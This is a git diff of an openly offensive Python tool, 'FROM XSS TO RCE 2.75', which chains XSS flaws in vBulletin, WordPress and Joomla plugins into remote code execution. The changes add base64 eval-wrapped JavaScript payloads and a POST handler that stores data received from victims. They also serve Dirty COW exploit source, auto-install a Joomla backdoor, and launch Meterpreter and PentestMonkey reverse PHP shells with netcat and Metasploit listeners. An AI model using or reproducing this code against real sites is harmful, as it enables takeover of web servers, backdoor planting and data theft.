') + return + + return + + except IOError: + self.send_error(404, 'File Not Found: {}'.format(self.path)) + # WordPress/generic (payload) web server class class WordPressHandler(BaseHTTPRequestHandler): - def do_GET(self): - try: - if self.path.endswith("x.js"): # Static for now - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(js_output) - return - - if self.path.endswith("js_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello?') - # NEW FEATURES BELOW - # Terminal and Popup Terminal Notifications - print fontcolors.YELLOW + fontcolors.BOLD+"[!] JavaScript payload was activated!"+fontcolors.ENDC - os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART - # Activate shell request for WordPress - curlpath = "%s%sactivateshell=true" % (target_hostname, activation_file) # Moved the "?" character to the individual files due to Joomla needs to use "&" - os.system('curl "%s" -o /dev/null -stderr /dev/null &' % curlpath) # If the Python script encounters an error, the response (i.e. error) will be in the JS output which breaks our payload. 
- return - - if self.path.endswith("php_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello again?') - YouGotShell() # NEW FEATURE - return - - if self.path.endswith("dcow32.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow32_output) # Serve File - return - - if self.path.endswith("dcow64.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow64_output) # Serve File - return - - # To be added in a future version of XSSER - #if self.path.endswith("joomla_hello_shell.zip"): - # self.send_response(200) - # self.send_header('Content-type', 'text/plain') - # self.end_headers() - # self.wfile.write(joomla_hello_shell) - # return - - if self.path.endswith(""): - self.send_response(200) - self.send_header('Content-type', 'text/html') - self.end_headers() - self.wfile.write('Empty

Nothing to see here..

') - return - - return - - except IOError: - self.send_error(404,'File Not Found: %s' % self.path) + # noinspection PyPep8Naming + def do_GET(self): # I know this is not PEP8 compliant, see class implementation. + try: + # if js_filename and js_filename != "": + if self.path.endswith(js_filename): # TODO: Check size limitations? + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(js_output) # Serve JS contents + return + + if self.path.endswith("js_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.send_header('Access-Control-Allow-Origin', '*') # Mostly here to limit browser console errors. + self.end_headers() + self.wfile.write('Hello?') + # NEW CODE BELOW + # Terminal and Popup Terminal Notifications + print FontColors.YELLOW + FontColors.BOLD + "[!] JavaScript payload was activated!" + FontColors.ENDC + # os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART + os.system('xterm -fa "Monospace" -fs 14 -hold -e ./js_alert.sh &') + # New method as gnome-terminal deprecated/removed too many options. + # Activate shell request for WordPress and Joomla + if activation_file is not "NOT_APPLICABLE": + # Because this happens so fast, we need to introduce a one second delay. + print "[*] Waiting 1 second before automatically activating shell." + time.sleep(1) + + # TODO: Test this - New method 2.75 + # todo This seems to work, but there's an odd 404 error when the shell is activated. + # todo See if you can eliminate this 404 error. + payload = {"activateshell": "true"} + url = "http://{}{}".format(target_hostname, activation_file) + requests.get(url, params=payload, timeout=3) + # TODO: Ask the user for the full URL including HTTP/HTTPS in the future. 
+ # curlpath = "{}{}activateshell=true".format(target_hostname, activation_file) + # os.system( + # 'curl "%s" -o /dev/null -stderr /dev/null &' % curlpath) + # If the Python script encounters an error, the response (i.e. error) will be in the JS output + # which breaks our payload. + return + + if self.path.endswith("php_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write('Hello again?') + you_got_shell() + return + + if self.path.endswith("dcow32.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow32_output) # Serve File + return + + if self.path.endswith("dcow64.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow64_output) # Serve File + return + + # TODO: Make the backdoor name dynamic in the future. + # TODO: This shouldn't be too hard, as the file being read is now handled elsewhere. + if self.path.endswith("Hello_Shell.zip"): # You can change this to anything. + self.send_response(200) # Just make sure it's consistent throughout the script. + # self.send_header('Content-type', 'text/plain') + self.send_header('Content-type', 'application/octet-stream') + self.send_header('Content-Disposition', 'attachment; filename=Hello_Shell.zip') + self.end_headers() + self.wfile.write(read_joomla_shell_file()) + return + + if self.path.endswith(""): + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write( + 'Empty

Nothing to see here..

') + return + + return + + except IOError: + self.send_error(404, 'File Not Found: {}'.format(self.path)) + + # Experimental POST-request handling below. + # noinspection PyPep8Naming + # https://stackoverflow.com/questions/4233218/python-how-do-i-get-key-value-pairs-from-the-basehttprequesthandler-http-post-h + def do_POST(self): + try: + content_length = int(self.headers['Content-Length']) # This may cause an error if not set. + post_data = self.rfile.read(content_length) # This may also cause an error in some cases. + + true_filename = "".join(random.sample(random_filename, 5))+".txt" + full_path = "Received_Data/" + true_filename + with open(full_path, "w") as filename: + filename.write(post_data) + print "[*] Wrote POST-data to: {}".format(true_filename) + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write("Empty" + "

Nothing to see here..

") + return + + except IOError: + self.send_error(404, 'File Not Found: {}'.format(self.path)) + # Dirty COW File Handling - Quick solution -global dcow32_output -global dcow64_output dcow32_file = open("Exploits/dirtycow32.c") dcow64_file = open("Exploits/dirtycow64.c") dcow32_output = dcow32_file.read() dcow64_output = dcow64_file.read() -# To be added in a future version of XSSER -# Joomla Shell File Handling -#global joomla_hello_shell -#joomla_hello_shell_file = open("Payloads/php/hello-world-fixed.zip") -#joomla_hello_shell = joomla_hello_shell_file.read() # Handle funny audio clip # PyGame was generally the best option, as LibVLC experienced clipping issues. -def YouGotShell(): - pygame.mixer.pre_init(48000, -16, 2, 4096) # Change from 48000 to 44100 for lower pitch - pygame.init() - pygame.mixer.init() - pygame.mixer.music.load('Audio/rapshell1.mp3') - pygame.mixer.music.play(1) - return +def you_got_shell(): # Now PEP8 (i.e. the IDE) is happy with the renamed function name xD + pygame.mixer.pre_init(44100, -16, 2, 4096) # Change from 48000 to 44100 for lower pitch + pygame.init() + pygame.mixer.init() + pygame.mixer.music.load('Audio/rapshell1.mp3') + pygame.mixer.music.play(1) + return + + +# TODO: Make the filename dynamic in the future +def read_joomla_shell_file(): + with open("Hello_Shell.zip", "rb") as filename: + return filename.read() + + +# Takes a string as input, and: +# - Removes newlines, comments, etc. +# - Base64 encodes payload. +# - Wraps encoded payload into a JS decoder. +def minify_and_encode_js(javascript_input): + minified = jsmin(javascript_input, quote_chars="'\"") # Removes comments and extra new lines + encoded = base64.b64encode(minified) # Base64 encodes the JS + output = 'eval(atob("{}"));'.format(encoded) # Wraps the content into a B64 JS Decoder. + return output + + +# Automatically gets all IP addresses and uses the first one. +# If multiple IP addresses are found, the user can then choose which to use. 
+def get_local_ip(): + try: + local_ip = check_output(['hostname', '--all-ip-addresses']).strip() + if len(local_ip.split(' ')) > 1: + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ IP Addr ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which IP address to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + counter = 1 + for ip in local_ip.split(' '): + print " â•‘ [{}] {:25} â•‘".format(counter, ip) + counter += 1 + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + ip_choice = raw_input(FontColors.BOLD + FontColors.BLUE + " >> " + FontColors.ENDC) + if ip_choice == 'q': + exit_xsser() + elif not ip_choice.isdigit(): + print FontColors.YELLOW + " [!] Your choice must be an integer. Quitting.." + FontColors.ENDC + exit_xsser(1) + elif int(ip_choice) > len(local_ip.split(' ')) or int(ip_choice) == 0: + print FontColors.YELLOW + " [!] Option not recognized. Quitting.." + FontColors.ENDC + exit_xsser(1) + else: + ip_choice = int(ip_choice) - 1 + return local_ip.split(' ')[ip_choice] + else: + return local_ip + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) + + +# Returns a blue colored IP address +# Formerly known as a variable: color_local_ip +def get_colored_ip(ip_address): + return FontColors.BLUE + ip_address + FontColors.ENDC # ====================== # # MENU FUNCTIONS # ====================== # - + + # Main menu +# TODO: Make a better menu system in the future. 
def main_menu(): - os.system('clear') - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ Main Menu ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which exploit to use: (OSVDB-ID)" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] vBulletin - vBSEO XSS (70854) â•‘" - print " â•‘ [2] WordPress - Better WP Security XSS (95884) â•‘" - print " â•‘ [3] Joomla - Security Check (EDB-ID 39879) â•‘" - print " â•‘ â•‘" - print " â•‘ [?] Drupal (To be implemented) â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_menu, 0, 0) - return + os.system('clear') + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Main Menu ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which exploit to use: (OSVDB-ID)" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] vBulletin - vBSEO XSS (70854) [!] â•‘" + print " â•‘ [2] WordPress - Better WP Security XSS (95884) â•‘" + print " â•‘ [3] Joomla - Security Check (EDB-ID 39879) â•‘" + print " â•‘ â•‘" + print " â•‘ [?] Drupal (To be implemented) â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. 
Quit\n" + FontColors.ENDC + choose_menu(exec_menu, 0, 0) + return + # vBulletin menu def menu1(): - global exploit_selection - exploit_selection="vBSEO" - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ vBulletin ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which payload to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] New Plugin (misc.php hook) â•‘" - print " â•‘ â•‘" - print " â•‘ â•‘" - print " â•‘ â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, vbulletin_menu, 1) - return + global exploit_selection + exploit_selection = "vBSEO" + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ vBulletin ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which payload to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] New Plugin (misc.php hook) â•‘" + print " â•‘ â•‘" + print " â•‘ Note: vBSEO is no longer updated. Many forums â•‘" + print " â•‘ have likely stopped using this plugin. â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. 
Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, vbulletin_menu, 1) + return + # WordPress menu def menu2(): - global exploit_selection - exploit_selection="BetterWPSecurity" - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ WordPress ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which payload to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] WPSEO (robots.txt & .htaccess) â•‘" - print " â•‘ [2] WordPress Current Theme (footer.php) â•‘" - print " â•‘ [3] WordPress Hello Plugin (hello.php) â•‘" - print " â•‘ â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, wordpress_menu, 2) - return + global exploit_selection + exploit_selection = "BetterWPSecurity" + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ WordPress ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which payload to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] WPSEO (robots.txt & .htaccess) â•‘" + print " â•‘ [2] WordPress Current Theme (footer.php) â•‘" + print " â•‘ [3] WordPress Hello Plugin (hello.php) â•‘" + print " â•‘ â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. 
Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, wordpress_menu, 2) + return + # Joomla menu def menu3(): - global exploit_selection - exploit_selection="SecurityCheck" # NEW OPTION - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ WordPress ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which payload to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] Add New Super User (Admin) â•‘" - print " â•‘ â•‘" - print " â•‘ Note: Select \"no payload\" on next page. â•‘" - print " â•‘ â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, joomla_menu, 3) - return + global exploit_selection + exploit_selection = "SecurityCheck" # NEW OPTION + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Joomla! ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which payload to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] Add New Super User (Admin) â•‘" + print " â•‘ [2] Auto-Install Hello Shell Backdoor [NEW] â•‘" + print " â•‘ â•‘" + print " â•‘ Note: Select \"no payload\" on next page. â•‘" + print " â•‘ â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. 
Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, joomla_menu, 3) + return + # Payload menu def payload_menu_func(origin): - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ Payloads ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which shell to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] Reverse Meterpreter (PHP) â•‘" - print " â•‘ [2] PentestMonkey Reverse PHP Shell â•‘" - print " â•‘ [3] PentestMonkey Reverse PHP Shell (Notify) â•‘" - print " â•‘ â•‘" - print " â•‘ [5] No payload (manual upload) â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, payload_menu, origin) - return - -def preparePayloadBanner(): - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ Config ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Payloads ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which shell to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] Reverse Meterpreter (PHP) â•‘" + print " â•‘ [2] PentestMonkey Reverse PHP Shell â•‘" + print " â•‘ [3] PentestMonkey Reverse PHP Shell (Notify) â•‘" + print " â•‘ â•‘" + print " â•‘ [5] No payload (special cases) â•‘" + print " â•‘ [9] Back â•‘" + 
print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, payload_menu, origin) + return + + +def prepare_payload_banner(): + os.system('clear') + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Config ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + # Handle menu selection -def choose_menu(MenuType, cms_actions, origin): - try: - choice = raw_input(fontcolors.BOLD + fontcolors.BLUE+ " >> " + fontcolors.ENDC) - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit() - MenuType(choice, cms_actions, origin) +def choose_menu(menu_type, cms_actions, origin): + choice = 0 # This is just to make the interpreter happy. + try: + choice = raw_input(FontColors.BOLD + FontColors.BLUE + " >> " + FontColors.ENDC) + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser() + menu_type(choice, cms_actions, origin) + # Execute main menu option def exec_menu(choice, cms_actions, origin): - os.system('clear') - ch = choice.lower() - if ch == '': - menu_actions['main_menu']() - else: - try: - menu_actions[ch]() - except KeyError: - print " [!] Invalid selection, please try again.\n" - menu_actions['main_menu']() - return + os.system('clear # {} {}'.format(cms_actions, origin)) # The extra code is just to make the IDE happy. + ch = choice.lower() + if ch == '': + menu_actions['main_menu']() # This doesn't work if we remove () + else: + try: + menu_actions[ch]() # This doesn't work if we remove () + except KeyError: + print " [!] 
Invalid selection, please try again.\n" + traceback.print_exc() + menu_actions['main_menu']() # This doesn't work if we remove () + return + # Execute sub menu option def exec_sub_menu(choice, sub_actions, origin): - os.system('clear') - ch = choice.lower() - if ch == '': - menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu - else: - try: - sub_actions[ch]() # Go into the next level sub-menu to choose e.g. payload type - except KeyError: - print " [!] Invalid selection, please try again.\n" - menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu - return + os.system('clear') + ch = choice.lower() + if ch == '': + menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu + else: + try: + sub_actions[ch]() # Go into the next level sub-menu to choose e.g. payload type + except KeyError: + print " [!] Invalid selection, please try again.\n" + traceback.print_exc() + menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu + return + # Back to main menu def back(): - menu_actions['main_menu']() - -# Exit program -def exit(): - sys.exit() + menu_actions['main_menu']() # vBulletin menu def vbmenu1(): - global payload_selection - payload_selection="vb_misc" - payload_menu_func(1) - # vBulletin New Plugin (misc.php hook) + global payload_selection + payload_selection = "vb_misc" + payload_menu_func(1) + # vBulletin New Plugin (misc.php hook) # WordPress menu def wpmenu1(): - global payload_selection - payload_selection="wpseo" - payload_menu_func(2) - # WordPress WPSEO (robots.txt & .htaccess) + global payload_selection + payload_selection = "wpseo" + payload_menu_func(2) + # WordPress WPSEO (robots.txt & .htaccess) + def wpmenu2(): - global payload_selection - payload_selection="wp_footer_theme" - payload_menu_func(2) - # WordPress Current Theme (footer.php) - + global payload_selection + payload_selection = "wp_footer_theme" + 
payload_menu_func(2) + # WordPress Current Theme (footer.php) + + def wpmenu3(): - global payload_selection - payload_selection="wp_hello_plugin" - payload_menu_func(2) - # WordPress Hello Plugin (hello.php) + global payload_selection + payload_selection = "wp_hello_plugin" + payload_menu_func(2) + # WordPress Hello Plugin (hello.php) # Joomla menu def jmenu1(): - global payload_selection - payload_selection="add_new_admin" - payload_menu_func(3) - # Joomla Add New Admin + global payload_selection + payload_selection = "add_new_admin" + payload_menu_func(3) + # Joomla Add New Admin + + +def jmenu2(): + global payload_selection + payload_selection = "install_backdoor" + payload_menu_func(3) + # Joomla Auto-Install Hello Shell # =============================== # 
@@ -436,373 +610,514 @@ def jmenu1(): # =============================== # # Payload menus +# TODO: This could be loaded from a separate file in the future? def meterpreter(): - global php_selection - php_selection="meterpreter" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - writeRCfile() # Write an RC file for Metasploit's Msfconsole - rcfile = '/tmp/xsser.rc' - os.system('gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing metasploit; msfconsole -r '+rcfile+'; exec bash\'"') - handleExploit(exploit_selection,js_output,lhost) + global exploit_selection + global php_selection + php_selection = "meterpreter" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + write_rc_file() # Write an RC file for Metasploit's Msfconsole + rcfile = '/tmp/xsser.rc' + # os.system( + # 'gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing metasploit; msfconsole -r ' + rcfile + + # '; exec bash\'"') + os.system('xterm -fa "Monospace" -fs 14 -hold -e "msfconsole -r ' + rcfile + '" &') # Please test this works + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit + def pentestmonkey(): - global php_selection - php_selection="pentestmonkey" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - os.system('gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing netcat; nc -lnvp '+lport+' -s '+lhost+'; exec bash\'"') - 
handleExploit(exploit_selection,js_output,lhost) + global php_selection + php_selection = "pentestmonkey" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + os.system('xterm -fa "Monospace" -fs 14 -hold -e "nc -lnvp ' + lport + ' -s ' + lhost + '" &') + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit + def pentestmonkey_notify(): - global php_selection - php_selection="pentestmonkey_notify" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - os.system('gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing netcat; nc -lnvp '+lport+' -s '+lhost+'; exec bash\'"') - handleExploit(exploit_selection,js_output,lhost) + global php_selection + php_selection = "pentestmonkey_notify" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + os.system('xterm -fa "Monospace" -fs 14 -hold -e "nc -lnvp ' + lport + ' -s ' + lhost + '" &') + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit + +# TODO: Optimize and simplify in the future. 
def payload_not_specified(): - global php_selection - php_selection="payload_not_specified" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - handleExploit(exploit_selection,js_output,lhost) + global php_selection + php_selection = "payload_not_specified" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit -def writeRCfile(): - input = "use multi/handler\n\ +def write_rc_file(): + user_input = "use multi/handler\n\ set payload php/meterpreter/reverse_tcp\n\ -set LHOST "+lhost+"\n\ -set LPORT "+lport+"\n\ +set LHOST " + lhost + "\n\ +set LPORT " + lport + "\n\ run -j" - file = open('/tmp/xsser.rc','w') - file.write(input) - file.close() - -# Preferably, this function needs to load/import the selected exploit module and execute it in the near future. -def handleExploit(exploit,js_payload,localhost): - if exploit == 'vBSEO': - try: - global evil_php - global evil_jsf - global xss_title - global target_link - global finaltarget - global http_port - global activation_file - http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. - evil_php = "%s%s%s" % (random.randrange(0, 253),random.randrange(1, 256),random.randrange(0, 255)) - evil_jsf = "%s%s%s" % (random.randrange(1, 257),random.randrange(0, 254),random.randrange(1, 258)) - xss_title = 'The Friendly Website" size="70" dir="ltr" tabindex="1">
